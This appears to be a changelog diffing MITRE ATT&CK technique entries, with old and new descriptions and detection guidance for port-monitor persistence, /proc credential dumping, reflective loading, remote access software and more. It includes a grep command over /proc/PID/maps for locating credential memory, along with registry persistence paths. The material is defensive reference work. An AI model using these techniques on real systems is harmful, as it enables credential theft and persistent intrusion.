modified2023-09-08 20:27:52.947000+00:002024-03-01 16:56:32.245000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version2.42.5

[T1547.010] Boot or Logon Autostart Execution: Port Monitors

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may use port monitors to run an adversary supplit1Adversaries may use port monitors to run an adversary suppli
>ed DLL during system boot for persistence or privilege escal>ed DLL during system boot for persistence or privilege escal
>ation. A port monitor can be set through the <code>AddMonito>ation. A port monitor can be set through the <code>AddMonito
>r</code> API call to set a DLL to be loaded at startup.(Cita>r</code> API call to set a DLL to be loaded at startup.(Cita
>tion: AddMonitor) This DLL can be located in <code>C:\Window>tion: AddMonitor) This DLL can be located in <code>C:\Window
>s\System32</code> and will be loaded by the print spooler se>s\System32</code> and will be loaded and run by the print sp
>rvice, spoolsv.exe, on boot. The spoolsv.exe process also ru>ooler service, `spoolsv.exe`under SYSTEM level permissions
>ns under SYSTEM level permissions.(Citation: Bloxham) Altern> on boot.(Citation: Bloxham)   Alternatively, an arbitrary D
>atively, an arbitrary DLL can be loaded if permissions allow>LL can be loaded if permissions allow writing a fully-qualif
> writing a fully-qualified pathname for that DLL to <code>HK>ied pathname for that DLL to the `Driver` value of an existi
>LM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.  >ng or new arbitrarily named subkey of <code>HKLM\SYSTEM\Curr
> The Registry key contains entries for the following:  * Loc>entControlSet\Control\Print\Monitors</code>. The Registry ke
>al Port * Standard TCP/IP Port * USB Monitor * WSD Port  Adv>y contains entries for the following:  * Local Port * Standa
>ersaries can use this technique to load malicious code at st>rd TCP/IP Port * USB Monitor * WSD Port 
>artup that will persist on system reboot and execute as SYST 
>EM. 
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:36:31.835000+00:002024-04-12 02:49:39.980000+00:00
descriptionAdversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_detectionMonitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns)Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors, paying particular attention to changes in the "Driver" subkey. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsHarun Küßner

[T1059.001] Command and Scripting Interpreter: PowerShell

Current version: 1.4

Version changed from: 1.3 → 1.4

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-27 17:19:48.136000+00:002024-03-01 18:01:37.575000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.31.4

[T1542] Pre-OS Boot

Current version: 1.2

Version changed from: 1.1 → 1.2

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 02:50:42.074000+00:002024-02-26 14:26:14.364000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version1.11.2

[T1003.007] OS Credential Dumping: Proc Filesystem

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may gather credentials from the proc filesystem t1Adversaries may gather credentials from the proc filesystem 
>or `/proc`. The proc filesystem is a pseudo-filesystem used >or `/proc`. The proc filesystem is a pseudo-filesystem used 
>as an interface to kernel data structures for Linux based sy>as an interface to kernel data structures for Linux based sy
>stems managing virtual memory. For each process, the `/proc/>stems managing virtual memory. For each process, the `/proc/
><PID>/maps` file shows how memory is mapped within the proce><PID>/maps` file shows how memory is mapped within the proce
>ss’s virtual address space. And `/proc/<PID>/mem`, exposed f>ss’s virtual address space. And `/proc/<PID>/mem`, exposed f
>or debugging purposes, provides access to the process’s virt>or debugging purposes, provides access to the process’s virt
>ual address space.(Citation: Picus Labs Proc cump 2022)(Cita>ual address space.(Citation: Picus Labs Proc cump 2022)(Cita
>tion: baeldung Linux proc map 2022)  When executing with roo>tion: baeldung Linux proc map 2022)  When executing with roo
>t privileges, adversaries can search these memory locations >t privileges, adversaries can search these memory locations 
>for all processes on a system that contain patterns that are>for all processes on a system that contain patterns indicati
> indicative of credentials, such as looking for fixed string>ve of credentials. Adversaries may use regex patterns, such 
>s in memory structures or cached hashes. When running withou>as <code>grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d'
>t privileged access, processes can still view their own virt> ' -f 1</code>, to look for fixed strings in memory structur
>ual memory locations. Some services or programs may save cre>es or cached hashes.(Citation: atomic-red proc file system) 
>dentials in clear text inside the process’s memory.(Citation>When running without privileged access, processes can still 
>: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc>view their own virtual memory locations. Some services or pr
> Gitbook)  If running as or with the permissions of a web br>ograms may save credentials in clear text inside the process
>owser, a process can search the `/maps` & `/mem` locations f>’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: 
>or common website credential patterns (that can also be used>Polop Linux PrivEsc Gitbook)  If running as or with the perm
> to find adjacent memory within the same structure) in which>issions of a web browser, a process can search the `/maps` &
> hashes or cleartext credentials may be located.> `/mem` locations for common website credential patterns (th
 >at can also be used to find adjacent memory within the same 
 >structure) in which hashes or cleartext credentials may be l
 >ocated.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-15 01:16:25.566000+00:002024-04-10 16:41:01.496000+00:00
descriptionAdversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022) When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns that are indicative of credentials, such as looking for fixed strings in memory structures or cached hashes. When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook) If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022) When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook) If running as or with the permissions of a web browser, a process can search the `/maps` & `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_detectionTo obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path /proc/\*/maps, where the \* directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.To obtain the passwords and hashes stored in memory, processes must open a maps file in the `/proc` filesystem for the process being analyzed. This file is stored under the path `/proc/PID/maps`, where the `PID` directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'atomic-red proc file system', 'description': 'Atomic Red Team. (2023, November). T1003.007 - OS Credential Dumping: Proc Filesystem. Retrieved March 28, 2024.', 'url': 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md'}

[T1057] Process Discovery

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may attempt to get information about running prot1Adversaries may attempt to get information about running pro
>cesses on a system. Information obtained could be used to ga>cesses on a system. Information obtained could be used to ga
>in an understanding of common software/applications running >in an understanding of common software/applications running 
>on systems within the network. Adversaries may use the infor>on systems within the network. Administrator or otherwise el
>mation from [Process Discovery](https://attack.mitre.org/tec>evated access may provide better process details. Adversarie
>hniques/T1057) during automated discovery to shape follow-on>s may use the information from [Process Discovery](https://a
> behaviors, including whether or not the adversary fully inf>ttack.mitre.org/techniques/T1057) during automated discovery
>ects the target and/or attempts specific actions.  In Window> to shape follow-on behaviors, including whether or not the 
>s environments, adversaries could obtain details on running >adversary fully infects the target and/or attempts specific 
>processes using the [Tasklist](https://attack.mitre.org/soft>actions.  In Windows environments, adversaries could obtain 
>ware/S0057) utility via [cmd](https://attack.mitre.org/softw>details on running processes using the [Tasklist](https://at
>are/S0106) or <code>Get-Process</code> via [PowerShell](http>tack.mitre.org/software/S0057) utility via [cmd](https://att
>s://attack.mitre.org/techniques/T1059/001). Information abou>ack.mitre.org/software/S0106) or <code>Get-Process</code> vi
>t processes can also be extracted from the output of [Native>a [PowerShell](https://attack.mitre.org/techniques/T1059/001
> API](https://attack.mitre.org/techniques/T1106) calls such >). Information about processes can also be extracted from th
>as <code>CreateToolhelp32Snapshot</code>. In Mac and Linux, >e output of [Native API](https://attack.mitre.org/techniques
>this is accomplished with the <code>ps</code> command. Adver>/T1106) calls such as <code>CreateToolhelp32Snapshot</code>.
>saries may also opt to enumerate processes via /proc.  On ne> In Mac and Linux, this is accomplished with the <code>ps</c
>twork devices, [Network Device CLI](https://attack.mitre.org>ode> command. Adversaries may also opt to enumerate processe
>/techniques/T1059/008) commands such as `show processes` can>s via `/proc`.   On network devices, [Network Device CLI](ht
> be used to display current running processes.(Citation: US->tps://attack.mitre.org/techniques/T1059/008) commands such a
>CERT-TA18-106A)(Citation: show_processes_cisco_cmd)>s `show processes` can be used to display current running pr
 >ocesses.(Citation: US-CERT-TA18-106A)(Citation: show_process
 >es_cisco_cmd)
Details
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_system_requirements['Administrator, SYSTEM may provide better process ownership details']
values_changed
STIX FieldOld valueNew Value
modified2023-08-11 21:40:56.448000+00:002024-04-16 12:43:55.369000+00:00
descriptionAdversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via `/proc`. On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5

[T1037.004] Boot or Logon Initialization Scripts: RC Scripts

Current version: 2.1

Version changed from: 2.0 → 2.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-27 19:58:01.927000+00:002024-04-16 12:22:29.150000+00:00
x_mitre_version2.02.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsNetwork

[T1620] Reflective Code Loading

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may reflectively load code into a process in ordt1Adversaries may reflectively load code into a process in ord
>er to conceal the execution of malicious payloads. Reflectiv>er to conceal the execution of malicious payloads. Reflectiv
>e loading involves allocating then executing payloads direct>e loading involves allocating then executing payloads direct
>ly within the memory of the process, vice creating a thread >ly within the memory of the process, vice creating a thread 
>or process backed by a file path on disk. Reflectively loade>or process backed by a file path on disk (e.g., [Shared Modu
>d payloads may be compiled binaries, anonymous files (only p>les](https://attack.mitre.org/techniques/T1129)).  Reflectiv
>resent in RAM), or just snubs of fileless executable code (e>ely loaded payloads may be compiled binaries, anonymous file
>x: position-independent shellcode).(Citation: Introducing Do>s (only present in RAM), or just snubs of fileless executabl
>nut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart EL>e code (ex: position-independent shellcode).(Citation: Intro
>F Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)>ducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: 
>  Reflective code injection is very similar to [Process Inje>Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandi
>ction](https://attack.mitre.org/techniques/T1055) except tha>ant BYOL) For example, the `Assembly.Load()` method executed
>t the “injection” loads code into the processes’ own memory > by [PowerShell](https://attack.mitre.org/techniques/T1059/0
>instead of that of a separate process. Reflective loading ma>01) may be abused to load raw code into the running process.
>y evade process-based detections since the execution of the >(Citation: Microsoft AssemblyLoad)  Reflective code injectio
>arbitrary code may be masked within a legitimate or otherwis>n is very similar to [Process Injection](https://attack.mitr
>e benign process. Reflectively loading payloads directly int>e.org/techniques/T1055) except that the “injection” loads co
>o memory may also avoid creating files or other artifacts on>de into the processes’ own memory instead of that of a separ
> disk, while also enabling malware to keep these payloads en>ate process. Reflective loading may evade process-based dete
>crypted (or otherwise obfuscated) until execution.(Citation:>ctions since the execution of the arbitrary code may be mask
> Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Inte>ed within a legitimate or otherwise benign process. Reflecti
>zer ACBackdoor)(Citation: S1 Old Rat New Tricks)>vely loading payloads directly into memory may also avoid cr
 >eating files or other artifacts on disk, while also enabling
 > malware to keep these payloads encrypted (or otherwise obfu
 >scated) until execution.(Citation: Stuart ELF Memory)(Citati
 >on: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: 
 >S1 Old Rat New Tricks)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-29 21:09:49.267000+00:002024-02-09 18:49:08.428000+00:00
descriptionAdversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)). Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft AssemblyLoad', 'description': 'Microsoft. (n.d.). Assembly.Load Method. Retrieved February 9, 2024.', 'url': 'https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load'}
x_mitre_contributorsJiraput Thamsongkrah

[T1219] Remote Access Software

Current version: 2.3

Version changed from: 2.2 → 2.3


Old Description
New Description
t1An adversary may use legitimate desktop support and remote at1An adversary may use legitimate desktop support and remote a
>ccess software to establish an interactive command and contr>ccess software to establish an interactive command and contr
>ol channel to target systems within networks. These services>ol channel to target systems within networks. These services
>, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, >, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, 
>`LogMein`, `AmmyyAdmin`, and other remote monitoring and man>`LogMein`, `AmmyyAdmin`, and other remote monitoring and man
>agement (RMM) tools, are commonly used as legitimate technic>agement (RMM) tools, are commonly used as legitimate technic
>al support software and may be allowed by application contro>al support software and may be allowed by application contro
>l within a target environment.(Citation: Symantec Living off>l within a target environment.(Citation: Symantec Living off
> the Land)(Citation: CrowdStrike 2015 Global Threat Report)(> the Land)(Citation: CrowdStrike 2015 Global Threat Report)(
>Citation: CrySyS Blog TeamSpy)  Remote access software may b>Citation: CrySyS Blog TeamSpy)  Remote access software may b
>e installed and used post-compromise as an alternate communi>e installed and used post-compromise as an alternate communi
>cations channel for redundant access or as a way to establis>cations channel for redundant access or as a way to establis
>h an interactive remote desktop session with the target syst>h an interactive remote desktop session with the target syst
>em. They may also be used as a component of malware to estab>em. They may also be used as a component of malware to estab
>lish a reverse connection or back-connect to a service or ad>lish a reverse connection or back-connect to a service or ad
>versary controlled system.   Adversaries may similarly abuse>versary-controlled system.   Adversaries may similarly abuse
> response features included in EDR and other defensive tools> response features included in EDR and other defensive tools
> that enable remote access.  Installation of many remote acc> that enable remote access.  Installation of many remote acc
>ess software may also include persistence (e.g., the softwar>ess software may also include persistence (e.g., the softwar
>e's installation routine creates a [Windows Service](https:/>e's installation routine creates a [Windows Service](https:/
>/attack.mitre.org/techniques/T1543/003)).>/attack.mitre.org/techniques/T1543/003)). Remote access modu
 >les/features may also exist as part of otherwise existing so
 >ftware (e.g., Google Chrome’s Remote Desktop).(Citation: Goo
 >gle Chrome Remote Desktop)(Citation: Chrome Remote Desktop)

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-28 16:23:51.194000+00:002024-04-12 23:52:30.489000+00:00
descriptionAn adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system. Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access. Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system. Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access. Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)
x_mitre_version2.22.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Google Chrome Remote Desktop', 'description': 'Google. (n.d.). Retrieved March 14, 2024.', 'url': 'https://support.google.com/chrome/answer/1649523'}
external_references{'source_name': 'Chrome Remote Desktop', 'description': 'Huntress. (n.d.). Retrieved March 14, 2024.', 'url': 'https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708'}
x_mitre_contributorsDray Agha, @Purp1eW0lf, Huntress Labs

[T1563] Remote Service Session Hijacking

Current version: 1.1

Version changed from: 1.0 → 1.1

New Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['SYSTEM', 'root']
values_changed
STIX FieldOld valueNew Value
modified2020-03-23 23:35:58.129000+00:002024-02-26 14:21:37.818000+00:00
x_mitre_version1.01.1

[T1021] Remote Services

Current version: 1.5

Version changed from: 1.4 → 1.5

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-06-02 15:31:40.498000+00:002024-03-01 15:35:38.299000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5

[T1496] Resource Hijacking

Current version: 1.5

Version changed from: 1.4 → 1.5

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-02 01:11:32.822000+00:002024-02-14 21:00:00.467000+00:00
external_references[2]['url']https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fchttps://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
x_mitre_version1.41.5
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content

[T1606.002] Forge Web Credentials: SAML Tokens

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-19 21:25:46.568000+00:002024-03-01 17:55:56.116000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: Process Creation

[T1053.005] Scheduled Task/Job: Scheduled Task

Current version: 1.5

Version changed from: 1.4 → 1.5

Details
values_changed
STIX FieldOld valueNew Value
modified2023-08-11 21:20:10.882000+00:002023-11-15 14:33:53.354000+00:00
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.41.5

[T1053] Scheduled Task/Job

Current version: 2.3

Version changed from: 2.2 → 2.3

New Mitigations:

Details
values_changed
STIX FieldOld valueNew Value
modified2023-03-30 21:01:52.697000+00:002024-03-01 15:29:46.832000+00:00
x_mitre_attack_spec_version2.1.03.2.0
x_mitre_version2.22.3

[T1518.001] Software Discovery: Security Software Discovery

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description
New Description
t1Adversaries may attempt to get a listing of security softwart1Adversaries may attempt to get a listing of security softwar
>e, configurations, defensive tools, and sensors that are ins>e, configurations, defensive tools, and sensors that are ins
>talled on a system or in a cloud environment. This may inclu>talled on a system or in a cloud environment. This may inclu
>de things such as firewall rules and anti-virus. Adversaries>de things such as cloud monitoring agents and anti-virus. Ad
> may use the information from [Security Software Discovery](>versaries may use the information from [Security Software Di
>https://attack.mitre.org/techniques/T1518/001) during automa>scovery](https://attack.mitre.org/techniques/T1518/001) duri
>ted discovery to shape follow-on behaviors, including whethe>ng automated discovery to shape follow-on behaviors, includi
>r or not the adversary fully infects the target and/or attem>ng whether or not the adversary fully infects the target and
>pts specific actions.  Example commands that can be used to >/or attempts specific actions.  Example commands that can be
>obtain security software information are [netsh](https://att> used to obtain security software information are [netsh](ht
>ack.mitre.org/software/S0108), <code>reg query</code> with [>tps://attack.mitre.org/software/S0108), <code>reg query</cod
>Reg](https://attack.mitre.org/software/S0075), <code>dir</co>e> with [Reg](https://attack.mitre.org/software/S0075), <cod
>de> with [cmd](https://attack.mitre.org/software/S0106), and>e>dir</code> with [cmd](https://attack.mitre.org/software/S0
> [Tasklist](https://attack.mitre.org/software/S0057), but ot>106), and [Tasklist](https://attack.mitre.org/software/S0057
>her indicators of discovery behavior may be more specific to>), but other indicators of discovery behavior may be more sp
> the type of software or security system the adversary is lo>ecific to the type of software or security system the advers
>oking for. It is becoming more common to see macOS malware p>ary is looking for. It is becoming more common to see macOS 
>erform checks for LittleSnitch and KnockKnock software.  Adv>malware perform checks for LittleSnitch and KnockKnock softw
>ersaries may also utilize cloud APIs to discover the configu>are.  Adversaries may also utilize the [Cloud API](https://a
>rations of firewall rules within an environment.(Citation: E>ttack.mitre.org/techniques/T1059/009) to discover cloud-nati
>xpel IO Evil in AWS) For example, the permitted IP ranges, p>ve security software installed on compute infrastructure, su
>orts or user accounts for the inbound/outbound rules of secu>ch as the AWS CloudWatch agent, Azure VM Agent, and Google C
>rity groups, virtual firewalls established within AWS for EC>loud Monitor agent. These agents  may collect  metrics and l
>2 and/or VPC instances, can be revealed by the <code>Describ>ogs from the VM, which may be centrally aggregated in a clou
>eSecurityGroups</code> action with various request parameter>d-based monitoring platform.
>s. (Citation: DescribeSecurityGroups - Amazon Elastic Comput 
>e Cloud) 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-21 12:30:00.939000+00:002024-04-16 00:15:53.303000+00:00
descriptionAdversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software. Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS) For example, the permitted IP ranges, ports or user accounts for the inbound/outbound rules of security groups, virtual firewalls established within AWS for EC2 and/or VPC instances, can be revealed by the DescribeSecurityGroups action with various request parameters. (Citation: DescribeSecurityGroups - Amazon Elastic Compute Cloud)Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This 